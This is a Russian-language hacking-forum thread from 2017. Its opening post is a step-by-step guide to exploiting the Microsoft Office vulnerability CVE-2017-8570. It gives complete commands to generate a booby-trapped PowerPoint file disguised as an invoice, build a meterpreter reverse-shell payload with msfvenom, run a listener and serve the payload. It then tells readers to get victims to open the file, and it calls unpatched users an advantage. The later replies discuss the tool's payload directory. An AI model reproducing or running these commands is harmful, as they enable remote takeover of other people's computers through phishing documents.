HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Инструменты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.08.2017, 18:55
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

Всем привет. Сегодня разберем такую уязвимость как Microsoft OfficeCVE 2017 8570.

Данная уязвимость довольно свежая, позволяет получить доступ к удаленной машине используя специально подготовленный файл PowerPoint, более подробно о ней можете почитать по ссылке:

https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570.

Использована она может быть на следующих версиях:
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
На данный момент уязвимость устранена в текущих обновлениях, но, как мы знаем, что многие пренебрегают обновлениями, что нам конечно на руку.

И так поехали:

1. Заходим по ссылке https://github.com/tezukanice/Office8570 скачиваем, не забываем читать README.md , там будет рассмотрено три сценария атаки используя данную уязвимость. Мы в данной статье остановимся на первом сценарии.



Вкратце:
- генерируем наш вредоносный PPSX файл,
- создаем полезную нагрузку и запускаем слушатель.
- запускаем сервер на 80 порту.

Давайте непосредственно приступим к делу.

Создаем в директории «Office8570» новую папку и назовем ее «template», далее переносим файл template.ppsx в эту папку. Если этого не сделать то при генерировании PPSX файла выскочит ошибка.



1.Сейчас генерируем наш PPSX файл, пишем в терминале в одну строчку следующее:
Код:


Код:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc
Не забываем вместо моего ip ставить свой, если кто не знает как узнать свой ip, делается это командой ifconfig. У вас должен появится файл Invoice.ppsx.



2. Создаем полезную нагрузку,где будет создан файл shell.exe в каталоге tmp, в моем случае это будет выглядеть следующим образом:

Код:


Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe
Для создания полезной нагрузки можем использовать любой другой инструмент, не обязательно использовать msfvenom, главное перенести полезную нагрузку потом в каталог tmp.

Запускаем слушатель:

Код:


Код:
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"
3.Далее в терминале пишем следующую строчку
Код:


Код:
python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe
по итогу, у нас запустится сервер на 80 порту.

Далее нам осталось впарить файл Invoice.ppsx , и как только его откроют ,с сервера погрузится наша полезная нагрузка.

Всем хорошего вечера и удачного пентеста!!!
 
Ответить с цитированием

  #2  
Старый 23.08.2017, 20:41
Breed
Новичок
Регистрация: 16.05.2017
Сообщений: 0
С нами: 4733437

Репутация: 0
По умолчанию

Вот видео эксплуатации CVE 2017 8570:
 
Ответить с цитированием

  #3  
Старый 23.08.2017, 22:08
Breed
Новичок
Регистрация: 16.05.2017
Сообщений: 0
С нами: 4733437

Репутация: 0
По умолчанию

Цитата:

IioS сказал(а):

А что будет если не кидать в /tmp/shell.exe, а запустить его из ../Office8570/ ?

Может я и ошибаюсь, но:
Цитата:

kot-gor сказал(а):

Для создания полезной нагрузки можем использовать любой другой инструмент, не обязательно использовать msfvenom,главное перенести полезную нагрузку потом в каталог tmp.

 
Ответить с цитированием

  #4  
Старый 23.08.2017, 22:38
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

Потому что утилита , настроена так, что бы подгружать полезную нагрузку с директории tmp.
автор это указал в одном из примеров.
В самом коде утилиты я не разбирался.По идее думаю что можно настроить на любую директорию.
 
Ответить с цитированием

  #5  
Старый 23.08.2017, 22:44
Breed
Новичок
Регистрация: 16.05.2017
Сообщений: 0
С нами: 4733437

Репутация: 0
По умолчанию

Лучше спроси у ТС. Я честно скажу, что не "щупал" (не пробовал).
Но навскидку скажу, что этого требует сам эксплойт.
https://github.com/tezukanice/Office8570/blob/master/cve-2017-8570_toolkit.py
[doublepost=1503513879,1503513817][/doublepost]

Цитата:

kot-gor сказал(а):

По идее думаю что можно настроить на любую директорию

Безусловно. Включи поиск по тексту на "TMP".
 
Ответить с цитированием

  #6  
Старый 23.08.2017, 22:59
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

Ради любопытства глянул, код на питоне простой , директорию можно легко поменять...
 
Ответить с цитированием

  #7  
Старый 23.08.2017, 23:30
Breed
Новичок
Регистрация: 16.05.2017
Сообщений: 0
С нами: 4733437

Репутация: 0
По умолчанию

Я писал не глядя, а потом посмотрел, чтобы убедиться - в точку!
 
Ответить с цитированием

  #8  
Старый 25.08.2017, 16:16
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

Ду уж,парни наверное не сидят без дела.хотя уязвимости чуть более месяца.
 
Ответить с цитированием

  #9  
Старый 08.12.2017, 08:18
Tayrus
Постоянный
Регистрация: 28.12.2017
Сообщений: 360
С нами: 4407912

Репутация: 0
По умолчанию

А если я укажу ip по типу 192.168. , то допустим если я скину на другой PC будет работать?
 
Ответить с цитированием

  #10  
Старый 08.12.2017, 08:20
mrOkey
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами: 4471577

Репутация: 0
По умолчанию

Интересно, а можно ли его забайпасить
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...